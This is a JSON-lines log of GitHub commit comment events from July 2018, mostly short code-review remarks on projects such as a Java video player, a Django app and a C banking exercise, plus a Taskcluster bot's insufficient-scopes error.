{"id":"7975119788","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29731352,"position":24,"line":400,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/VideoManager.java","commit_id":"52efe7edba04bdb5c30356909bc3713d756f97a0","created_at":"2018-07-17T08:23:08Z","updated_at":"2018-07-17T08:23:08Z","author_association":"NONE","body":"At this point, because the video is ready to play, you play and update the FB model's unix time and state."}},"created_at":"2018-07-17T08:23:08Z"}
{"id":"7975120269","type":"CommitCommentEvent","actor":{"login":"YoungDeeZH"},"repo":{"name":"YoungDeeZH/test-webpack"},"payload":{"comment":{"id":29731353,"position":8,"line":8,"path":"package.json","commit_id":"8f8a4c31546a632cb7a553657262661a3a15799e","created_at":"2018-07-17T08:23:14Z","updated_at":"2018-07-17T08:23:14Z","author_association":"OWNER","body":"使用webpack打包输出资源：\r\n`npm run build`"}},"created_at":"2018-07-17T08:23:14Z"}
{"id":"7975120492","type":"CommitCommentEvent","actor":{"login":"mmg-vp"},"repo":{"name":"Voltc/blog"},"payload":{"comment":{"id":29731354,"position":51,"line":51,"path":"app/controllers/articles_controller.rb","commit_id":"564f126da9149aa9b4f24739bee0b1c57c68c376","created_at":"2018-07-17T08:23:16Z","updated_at":"2018-07-17T08:23:16Z","author_association":"NONE","body":"https://github.com/rubocop-hq/ruby-style-guide\r\ndon't use new line between end's in the end of file, use new empty line as a last line"}},"created_at":"2018-07-17T08:23:16Z"}
{"id":"7975151896","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29731464,"position":16,"line":15,"path":"app/forms.py","commit_id":"7d88dc96c895fac0d8215b693f195a500b504fb0","created_at":"2018-07-17T08:29:20Z","updated_at":"2018-07-17T08:29:20Z","author_association":"NONE","body":"это остается во views.py"}},"created_at":"2018-07-17T08:29:20Z"}
{"id":"7975153038","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29731468,"position":179,"line":1536,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/VideoManager.java","commit_id":"52efe7edba04bdb5c30356909bc3713d756f97a0","created_at":"2018-07-17T08:29:33Z","updated_at":"2018-07-17T08:29:33Z","author_association":"NONE","body":"Experimental.  Check if resync needed whenever the video starts to play."}},"created_at":"2018-07-17T08:29:33Z"}
{"id":"7975159066","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29731475,"position":197,"line":1561,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/VideoManager.java","commit_id":"52efe7edba04bdb5c30356909bc3713d756f97a0","created_at":"2018-07-17T08:30:38Z","updated_at":"2018-07-17T08:30:38Z","author_association":"NONE","body":"Because there's not resyncing required in PAUSE or AUTO_PAUSE state, set hasSyncedUp to true because if this handler is called in this state, then the video is at the correct time"}},"created_at":"2018-07-17T08:30:38Z"}
{"id":"7975163793","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29731480,"position":253,"line":1712,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/VideoManager.java","commit_id":"52efe7edba04bdb5c30356909bc3713d756f97a0","created_at":"2018-07-17T08:31:31Z","updated_at":"2018-07-17T08:31:31Z","author_association":"NONE","body":"Every time you seek, potentially not synced up, so have to reset hasSyncedUp to trigger future resyncs"}},"created_at":"2018-07-17T08:31:31Z"}
{"id":"7975164277","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"glandium/git-cinnabar"},"payload":{"comment":{"id":29731481,"position":null,"line":null,"path":null,"commit_id":"fd08ddbfe3893451bcc67deb0a4b6679b6ceceda","created_at":"2018-07-17T08:31:36Z","updated_at":"2018-07-17T08:31:36Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AllOf\": [\n    \"queue:route:index.github.{{ event.head.user.login }}.{{ event.head.repo.name }}.*\",\n    \"queue:route:index.github.{{ event.head.user.login }}.{{ event.head.repo.name }}.decision.{{ event.head.sha }}\"\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/glandium/git-cinnabar:branch:next\",\n  \"assume:repo:github.com/glandium/git-cinnabar:decision-task\",\n  \"index:insert-task:github.glandium.git-cinnabar.*\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:index.github.glandium.git-cinnabar.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:get:repo:github.com/glandium.git-cinnabar:*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    \"assume:repo:github.com/glandium/git-cinnabar:decision-task\",\n    \"queue:route:index.github.{{ event.head.user.login }}.{{ event.head.repo.name }}.*\",\n    \"secrets:get:repo:github.com/glandium.git-cinnabar:codecov\",\n    \"queue:route:index.github.{{ event.head.user.login }}.{{ event.head.repo.name }}.decision.{{ event.head.sha }}\",\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/github-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/github-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/github-worker\",\n                \"queue:task-group-id:taskcluster-github/KDG5EBbOSaqKYM87JIPOTw\",\n                \"queue:schedule-task:taskcluster-github/KDG5EBbOSaqKYM87JIPOTw/IVz7770zTgmP_kl-3tLyGg\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-17T08:31:36.767Z\n\n</details>"}},"created_at":"2018-07-17T08:31:36Z"}
{"id":"7975164890","type":"CommitCommentEvent","actor":{"login":"LIULi-VVET"},"repo":{"name":"grpc/grpc-java"},"payload":{"comment":{"id":29731488,"position":null,"line":null,"path":null,"commit_id":"146b6006b3cc003f68100d10da4ffce8225cc31d","created_at":"2018-07-17T08:31:43Z","updated_at":"2018-07-17T08:31:43Z","author_association":"NONE","body":"But I don’t know how to deal with as follows:\r\n@Override public final io.grpc.ServerServiceDefinition bindService()\r\n@Override public void invoke(Req request, io.grpc.stub.StreamObserver<Resp> responseObserver)\r\n@Override public io.grpc.stub.StreamObserver<Req> invoke(io.grpc.stub.StreamObserver<Resp> responseObserver)\r\n@Override  public com.google.protobuf.Descriptors.ServiceDescriptor getServiceDescriptor()\r\n@Override public com.google.protobuf.Descriptors.MethodDescriptor getMethodDescriptor()\r\n"}},"created_at":"2018-07-17T08:31:43Z"}
{"id":"7975166344","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29731504,"position":256,"line":1715,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/VideoManager.java","commit_id":"52efe7edba04bdb5c30356909bc3713d756f97a0","created_at":"2018-07-17T08:31:59Z","updated_at":"2018-07-17T08:31:59Z","author_association":"NONE","body":"When you seek, need to empty loaded users and wait for quorum"}},"created_at":"2018-07-17T08:31:59Z"}
{"id":"7975167811","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29731505,"position":53,"line":63,"path":"BankManagement/BankManagement/Bank.c","commit_id":"31ba98a285e37c3d42fbc30830ecb69b2cca88dc","created_at":"2018-07-17T08:32:15Z","updated_at":"2018-07-17T08:32:15Z","author_association":"NONE","body":"This function should be inside bankAPI as private function (static). why? because you give the user the function new_acc, and new_acc use this function internally"}},"created_at":"2018-07-17T08:32:15Z"}
{"id":"7975169331","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29731508,"position":39,"line":35,"path":"app/forms.py","commit_id":"7d88dc96c895fac0d8215b693f195a500b504fb0","created_at":"2018-07-17T08:32:31Z","updated_at":"2018-07-17T08:32:31Z","author_association":"NONE","body":"is_valid() оставить во views.py"}},"created_at":"2018-07-17T08:32:31Z"}
{"id":"7975172205","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29731511,"position":277,"line":1739,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/VideoManager.java","commit_id":"52efe7edba04bdb5c30356909bc3713d756f97a0","created_at":"2018-07-17T08:33:04Z","updated_at":"2018-07-17T08:33:04Z","author_association":"NONE","body":"Calling onUISeek will for an update to clear loaded users.  On PAUSE state, you should still wait for all users to load so that the model will have an accurate representation of which users are ready to play"}},"created_at":"2018-07-17T08:33:04Z"}
{"id":"7975174778","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29731514,"position":21,"line":26,"path":"BankManagement/BankManagement/bankAPI.c","commit_id":"31ba98a285e37c3d42fbc30830ecb69b2cca88dc","created_at":"2018-07-17T08:33:33Z","updated_at":"2018-07-17T08:33:33Z","author_association":"NONE","body":"bad variable name. WTF is f? use informative names. For your case you can use: \r\nFIle *userdata_file = ..."}},"created_at":"2018-07-17T08:33:33Z"}
{"id":"7975175887","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29731521,"position":4,"line":39,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/StageDatabase.java","commit_id":"59477cb7fbd36da33b6da662cc998e89d2aff728","created_at":"2018-07-17T08:33:45Z","updated_at":"2018-07-17T08:33:45Z","author_association":"NONE","body":"New case to update fields, in particular loaded users, when seeking"}},"created_at":"2018-07-17T08:33:45Z"}
{"id":"7975180440","type":"CommitCommentEvent","actor":{"login":"ThiefMaster"},"repo":{"name":"errikos/indico"},"payload":{"comment":{"id":29731537,"position":14,"line":255,"path":"indico/modules/events/settings.py","commit_id":"d66b2b239df637837bbc4868990920a19fad688f","created_at":"2018-07-17T08:34:35Z","updated_at":"2018-07-17T08:34:35Z","author_association":"NONE","body":"use `TimedeltaConverter` to store the datetime"}},"created_at":"2018-07-17T08:34:35Z"}
{"id":"7975180670","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29731539,"position":10,"line":7,"path":"app/models.py","commit_id":"7d88dc96c895fac0d8215b693f195a500b504fb0","created_at":"2018-07-17T08:34:38Z","updated_at":"2018-07-17T08:34:38Z","author_association":"NONE","body":"не понятно что за 'сu' и 'ex'. И если читал статью, то там второе определение с большой буквы. Это то что будет отобрахаться пользователю. А у тебя с маленькой"}},"created_at":"2018-07-17T08:34:38Z"}
{"id":"7975181646","type":"CommitCommentEvent","actor":{"login":"ThiefMaster"},"repo":{"name":"errikos/indico"},"payload":{"comment":{"id":29731541,"position":7,"line":28,"path":"indico/modules/events/contributions/templates/management/contributions.html","commit_id":"d66b2b239df637837bbc4868990920a19fad688f","created_at":"2018-07-17T08:34:49Z","updated_at":"2018-07-17T08:34:49Z","author_association":"NONE","body":"i don't think we need a reload here at all"}},"created_at":"2018-07-17T08:34:49Z"}
{"id":"7975183527","type":"CommitCommentEvent","actor":{"login":"ThiefMaster"},"repo":{"name":"errikos/indico"},"payload":{"comment":{"id":29731547,"position":9,"line":191,"path":"indico/modules/events/contributions/forms.py","commit_id":"d66b2b239df637837bbc4868990920a19fad688f","created_at":"2018-07-17T08:35:09Z","updated_at":"2018-07-17T08:35:09Z","author_association":"NONE","body":"just remove the overridden method since it doesn't do anything"}},"created_at":"2018-07-17T08:35:09Z"}
{"id":"7975186243","type":"CommitCommentEvent","actor":{"login":"jayaveludev"},"repo":{"name":"jayaveludev/Magic-Book-Project"},"payload":{"comment":{"id":29731551,"position":null,"line":null,"path":null,"commit_id":"558a21cfd515112ad423db4421324802189cab65","created_at":"2018-07-17T08:35:38Z","updated_at":"2018-07-17T08:35:38Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-17T08:35:38Z"}
{"id":"7975186281","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29731552,"position":13,"line":465,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/VideoManager.java","commit_id":"59477cb7fbd36da33b6da662cc998e89d2aff728","created_at":"2018-07-17T08:35:38Z","updated_at":"2018-07-17T08:35:38Z","author_association":"NONE","body":"If changing state from AUTO_PAUSED to PLAYING, calculate delta if quorum was reached already, else don't"}},"created_at":"2018-07-17T08:35:38Z"}
{"id":"7975186556","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29731553,"position":21,"line":26,"path":"BankManagement/BankManagement/bankAPI.c","commit_id":"31ba98a285e37c3d42fbc30830ecb69b2cca88dc","created_at":"2018-07-17T08:35:42Z","updated_at":"2018-07-17T08:35:42Z","author_association":"NONE","body":"Moreover, read about absolute vs relative paths. you use absolute path. That means that if I will run your code, It will FAIL! Why? because this path exists only in your computer! replace it with relative path to \"Data\" folder"}},"created_at":"2018-07-17T08:35:42Z"}
{"id":"7975186657","type":"CommitCommentEvent","actor":{"login":"ThiefMaster"},"repo":{"name":"errikos/indico"},"payload":{"comment":{"id":29731554,"position":5,"line":107,"path":"indico/modules/events/contributions/blueprint.py","commit_id":"d66b2b239df637837bbc4868990920a19fad688f","created_at":"2018-07-17T08:35:43Z","updated_at":"2018-07-17T08:35:43Z","author_association":"NONE","body":"s/event-wide/default/"}},"created_at":"2018-07-17T08:35:43Z"}
{"id":"7975190246","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29731558,"position":25,"line":21,"path":"app/views.py","commit_id":"7d88dc96c895fac0d8215b693f195a500b504fb0","created_at":"2018-07-17T08:36:23Z","updated_at":"2018-07-17T08:36:23Z","author_association":"NONE","body":"а если форма выдала ошибки? надо is_valid() тут обработать. В форме можно проверить есть есть user, если есть, то вернуть его"}},"created_at":"2018-07-17T08:36:23Z"}
{"id":"7975190461","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29731559,"position":22,"line":27,"path":"BankManagement/BankManagement/bankAPI.c","commit_id":"31ba98a285e37c3d42fbc30830ecb69b2cca88dc","created_at":"2018-07-17T08:36:26Z","updated_at":"2018-07-17T08:36:26Z","author_association":"NONE","body":"Excellent!"}},"created_at":"2018-07-17T08:36:26Z"}
{"id":"7975198956","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29731577,"position":30,"line":1094,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/VideoManager.java","commit_id":"59477cb7fbd36da33b6da662cc998e89d2aff728","created_at":"2018-07-17T08:38:04Z","updated_at":"2018-07-17T08:38:04Z","author_association":"NONE","body":"Already called when inserting into loaded users"}},"created_at":"2018-07-17T08:38:04Z"}
{"id":"7975199967","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29731578,"position":4,"line":4,"path":"orders/models.py","commit_id":"7d88dc96c895fac0d8215b693f195a500b504fb0","created_at":"2018-07-17T08:38:16Z","updated_at":"2018-07-17T08:38:16Z","author_association":"NONE","body":"когда создаешь model, то лучше называть в единственном числе. Так как это описание объекта. Одного. "}},"created_at":"2018-07-17T08:38:16Z"}
{"id":"7975202585","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29731588,"position":5,"line":5,"path":"orders/views.py","commit_id":"7d88dc96c895fac0d8215b693f195a500b504fb0","created_at":"2018-07-17T08:38:45Z","updated_at":"2018-07-17T08:38:45Z","author_association":"NONE","body":"пустая строка в конце"}},"created_at":"2018-07-17T08:38:45Z"}
{"id":"7975206457","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29731597,"position":18,"line":21,"path":"BankManagement/BankManagement/bankAPI.h","commit_id":"31ba98a285e37c3d42fbc30830ecb69b2cca88dc","created_at":"2018-07-17T08:39:31Z","updated_at":"2018-07-17T08:39:31Z","author_association":"NONE","body":"Ugly name... I think Userdata is better. Use Ctrl RR if you want to change "}},"created_at":"2018-07-17T08:39:31Z"}
{"id":"7975210285","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29731600,"position":159,"line":1391,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/VideoManager.java","commit_id":"59477cb7fbd36da33b6da662cc998e89d2aff728","created_at":"2018-07-17T08:40:13Z","updated_at":"2018-07-17T08:40:13Z","author_association":"NONE","body":"When checking if the video is close enough to the accurate time, it doesn't matter if it's > 100 milliseconds ahead or > 100 milliseconds behind, we still need to resync.  Therefore, the absolute value of the difference is used to determine if resync needed"}},"created_at":"2018-07-17T08:40:13Z"}
{"id":"7975214487","type":"CommitCommentEvent","actor":{"login":"alexanderadam"},"repo":{"name":"PulseSoftwareInc/fix-db-schema-conflicts"},"payload":{"comment":{"id":29731603,"position":null,"line":null,"path":null,"commit_id":"fd9a105b1836e32cb81a25ba8eeb84534bca1685","created_at":"2018-07-17T08:41:03Z","updated_at":"2018-07-17T08:41:03Z","author_association":"NONE","body":"Hi @tonyta would (or did) you consider making a PR to the official gem?"}},"created_at":"2018-07-17T08:41:03Z"}
{"id":"7975215365","type":"CommitCommentEvent","actor":{"login":"GabsReDeal"},"repo":{"name":"Code-Bullet/Google-Chrome-Dino-Game-AI"},"payload":{"comment":{"id":29731604,"position":null,"line":null,"path":null,"commit_id":"9d601157baf4de54b20454170af8d276c526e113","created_at":"2018-07-17T08:41:14Z","updated_at":"2018-07-17T08:41:14Z","author_association":"NONE","body":"Alright, it is quite simple really.\r\n\r\nFirstly you need to download the source files (since that's what is given) then you will open the source files using Processing. Processing itself is an IDE and you get it by downloading it from their official website.\r\n\r\nThese are the steps you need to follow:\r\n\r\n**1.** Download Processing and extract it into a folder: https://processing.org/download/\r\n\r\n**2.** Go to the main page of this repository which is \r\nhttps://github.com/Code-Bullet/Google-Chrome-Dino-Game-AI\r\n\r\n**3.** Click the green 'Clone or Download' button and select Download ZIP.\r\n\r\n**4.** Extract the files into a folder.\r\n\r\n**5.** Navigate to the main folder which contains a lot of Processing Source Code (.pde) files.\r\n\r\n**6.** Open any one of the .pde files using processing.\r\n_This could be done by simple dragging and dropping the file onto the processing.exe downloaded in the first step._\r\n\r\n**7.** Press the play button up top to run the code.\r\n\r\n![step1](https://user-images.githubusercontent.com/33545121/42805730-e0bcaf9c-89ac-11e8-855f-c9533b63a344.JPG)\r\n\r\n![step3](https://user-images.githubusercontent.com/33545121/42805745-ecc3c924-89ac-11e8-96ba-59122a9d2e9a.jpg)\r\n\r\n![step7](https://user-images.githubusercontent.com/33545121/42806097-e95b52f6-89ad-11e8-8c8f-e07223c9e2c9.jpg)\r\n\r\n"}},"created_at":"2018-07-17T08:41:14Z"}
{"id":"7975218247","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29731612,"position":162,"line":1394,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/VideoManager.java","commit_id":"59477cb7fbd36da33b6da662cc998e89d2aff728","created_at":"2018-07-17T08:41:48Z","updated_at":"2018-07-17T08:41:48Z","author_association":"NONE","body":"If difference in play time > 0, then that means that after buffering, the video was behind, so we take buffering time into account for next seek.  If difference < 0, that means it was seeked too far ahead, so next time just seek to accurate time because buffer time not causing too much of a delay"}},"created_at":"2018-07-17T08:41:48Z"}
{"id":"7975219711","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29731614,"position":180,"line":1409,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/VideoManager.java","commit_id":"59477cb7fbd36da33b6da662cc998e89d2aff728","created_at":"2018-07-17T08:42:04Z","updated_at":"2018-07-17T08:42:04Z","author_association":"NONE","body":"If didn't resync, then reset count"}},"created_at":"2018-07-17T08:42:04Z"}
{"id":"7975223038","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29731620,"position":140,"line":1368,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/VideoManager.java","commit_id":"59477cb7fbd36da33b6da662cc998e89d2aff728","created_at":"2018-07-17T08:42:40Z","updated_at":"2018-07-17T08:42:40Z","author_association":"NONE","body":"Returns boolean that indicates whether resync is continuing"}},"created_at":"2018-07-17T08:42:40Z"}
{"id":"7975224389","type":"CommitCommentEvent","actor":{"login":"ozasadnyy"},"repo":{"name":"davinkevin/hoverboard"},"payload":{"comment":{"id":29731622,"position":16,"line":106,"path":"src/elements/dialogs/session-details.html","commit_id":"c63bfb3893c936149bfc03ebbe48a15b23278e47","created_at":"2018-07-17T08:42:53Z","updated_at":"2018-07-17T08:42:53Z","author_association":"NONE","body":"pass `session.speakers` here, fewer checks would be inside the function :)"}},"created_at":"2018-07-17T08:42:53Z"}
{"id":"7975224981","type":"CommitCommentEvent","actor":{"login":"GuardianRM"},"repo":{"name":"GuardianRM/Stockfish"},"payload":{"comment":{"id":29731624,"position":null,"line":null,"path":null,"commit_id":"1a3044e155ca2932a186ed2df850ed64d6b846f0","created_at":"2018-07-17T08:43:00Z","updated_at":"2018-07-17T08:43:00Z","author_association":"OWNER","body":"\r\nIf there is a relationship between the number of moves and the reduction, then apparently there should be a relationship with statScore. Perhaps this relationship is less obvious than with the number of moves, but perhaps a more fine-tuning can help here. It seems there was a test of the replacement sample ONE_PLY on the reductionValue, but maybe it's worth it to test again, directly proportional to the number of moves and statScore"}},"created_at":"2018-07-17T08:43:00Z"}
{"id":"7975227048","type":"CommitCommentEvent","actor":{"login":"kazakovichna"},"repo":{"name":"kazakovichna/GamE_AgE_TR2"},"payload":{"comment":{"id":29731625,"position":null,"line":null,"path":null,"commit_id":"e55be1a6cae6fd0ba5a35a3b19205ccc7964f04e","created_at":"2018-07-17T08:43:24Z","updated_at":"2018-07-17T08:43:24Z","author_association":"OWNER","body":"make clear field, make string ship/"}},"created_at":"2018-07-17T08:43:24Z"}
{"id":"7975227076","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/electrs"},"payload":{"comment":{"id":29731626,"position":null,"line":null,"path":null,"commit_id":"d422dc09cb249cc7398c876b587e53645b2fa755","created_at":"2018-07-17T08:43:24Z","updated_at":"2018-07-17T08:43:24Z","author_association":"OWNER","body":"Fixes #27 "}},"created_at":"2018-07-17T08:43:24Z"}
{"id":"7975230087","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29731630,"position":223,"line":1596,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/VideoManager.java","commit_id":"59477cb7fbd36da33b6da662cc998e89d2aff728","created_at":"2018-07-17T08:43:59Z","updated_at":"2018-07-17T08:43:59Z","author_association":"NONE","body":"If not synced up, don't count this user as having loaded successfully"}},"created_at":"2018-07-17T08:43:59Z"}
{"id":"7975231532","type":"CommitCommentEvent","actor":{"login":"ozasadnyy"},"repo":{"name":"davinkevin/hoverboard"},"payload":{"comment":{"id":29731631,"position":36,"line":218,"path":"src/elements/dialogs/session-details.html","commit_id":"c63bfb3893c936149bfc03ebbe48a15b23278e47","created_at":"2018-07-17T08:44:15Z","updated_at":"2018-07-17T08:44:15Z","author_association":"NONE","body":"if you pass `speakers` here you don't need to check `session` for null.\r\n"}},"created_at":"2018-07-17T08:44:15Z"}
{"id":"7975232371","type":"CommitCommentEvent","actor":{"login":"Shubham740"},"repo":{"name":"Shubham740/FetchSample"},"payload":{"comment":{"id":29731633,"position":null,"line":null,"path":null,"commit_id":"91858d512c5a4de816688809bc190486be40906f","created_at":"2018-07-17T08:44:24Z","updated_at":"2018-07-17T08:44:24Z","author_association":"OWNER","body":"This  project is used to provide the sample how to download the file  with Fetch Library \r\n In this Project we  have to follow some  basic steps \r\n\r\nFirst we needed to add the dependency in our project \r\n\r\n![screenshot from 2018-07-17 13-50-00](https://user-images.githubusercontent.com/23557343/42805944-ca067774-89ca-11e8-87eb-0ee60b9149e7.png)\r\n\r\nThen we need to add the permssions in Android manifest file  \r\n\r\n\r\n![screenshot from 2018-07-17 13-51-52](https://user-images.githubusercontent.com/23557343/42805984-e40aff78-89ca-11e8-9936-fcfbdd2c6c95.png)\r\n\r\n\r\nCreate one Async task which implements the fetch listener \r\n\r\n\r\n![screenshot from 2018-07-17 13-53-45](https://user-images.githubusercontent.com/23557343/42806015-ff2ee6ca-89ca-11e8-9b67-e8fa6c02c061.png)\r\n\r\nthen we need to initialize  the fetch in doInBackground  method of AsycnTask \r\n\r\n![screenshot from 2018-07-17 13-53-49](https://user-images.githubusercontent.com/23557343/42806051-23e2a178-89cb-11e8-8bf3-91844416c961.png)\r\n\r\nAfter initializing it we can get all the callbacks of Fetch such as OnCompleted ,onResumed , OnQueued , OnError etc \r\n![screenshot from 2018-07-17 13-53-53](https://user-images.githubusercontent.com/23557343/42806112-47a3e7c0-89cb-11e8-8294-0d39d90675f8.png)\r\n\r\n\r\nCreate one interface In Asynctask which helps us to provide the callback when item is downloaded on get some error on  UI \r\n![screenshot from 2018-07-17 13-53-57](https://user-images.githubusercontent.com/23557343/42806257-abeaf642-89cb-11e8-9a42-3b43dfe42aec.png)\r\n\r\n\r\n\r\nCreate one Util class which can be helpful to provide all the utils method . it is not mandatory to create the Utils class i have created to provide the good code structure \r\n\r\n![screenshot from 2018-07-17 13-59-42](https://user-images.githubusercontent.com/23557343/42806194-763400ac-89cb-11e8-81c3-1190240a774a.png)\r\n\r\n\r\n \r\n\r\n\r\n\r\n"}},"created_at":"2018-07-17T08:44:24Z"}
{"id":"7975232906","type":"CommitCommentEvent","actor":{"login":"killanarajesh"},"repo":{"name":"killanarajesh/applications"},"payload":{"comment":{"id":29731637,"position":null,"line":null,"path":null,"commit_id":"95a89a7f4102a59e109dbc6b5a29cf8d8dd9cd8c","created_at":"2018-07-17T08:44:31Z","updated_at":"2018-07-17T08:44:31Z","author_association":"OWNER","body":"delete"}},"created_at":"2018-07-17T08:44:31Z"}
{"id":"7975234013","type":"CommitCommentEvent","actor":{"login":"Shubham740"},"repo":{"name":"Shubham740/FetchSample"},"payload":{"comment":{"id":29731638,"position":null,"line":null,"path":null,"commit_id":"91858d512c5a4de816688809bc190486be40906f","created_at":"2018-07-17T08:44:41Z","updated_at":"2018-07-17T08:44:41Z","author_association":"OWNER","body":"Added some screenshot of the project "}},"created_at":"2018-07-17T08:44:41Z"}
{"id":"7975234927","type":"CommitCommentEvent","actor":{"login":"ozasadnyy"},"repo":{"name":"davinkevin/hoverboard"},"payload":{"comment":{"id":29731639,"position":41,"line":223,"path":"src/elements/dialogs/session-details.html","commit_id":"c63bfb3893c936149bfc03ebbe48a15b23278e47","created_at":"2018-07-17T08:44:52Z","updated_at":"2018-07-17T08:44:52Z","author_association":"NONE","body":"if array is empty it will return `[]` in any case"}},"created_at":"2018-07-17T08:44:52Z"}
{"id":"7975235124","type":"CommitCommentEvent","actor":{"login":"irfansyedpg"},"repo":{"name":"londonappbrewery/i-am-poor-android-irfansyedpg"},"payload":{"comment":{"id":29731640,"position":4,"line":12,"path":"app/src/main/res/layout/activity_main.xml","commit_id":"3a43e584c1674d4b874790dbb8f42f9fe7116958","created_at":"2018-07-17T08:44:54Z","updated_at":"2018-07-17T08:44:54Z","author_association":"COLLABORATOR","body":"good"}},"created_at":"2018-07-17T08:44:54Z"}
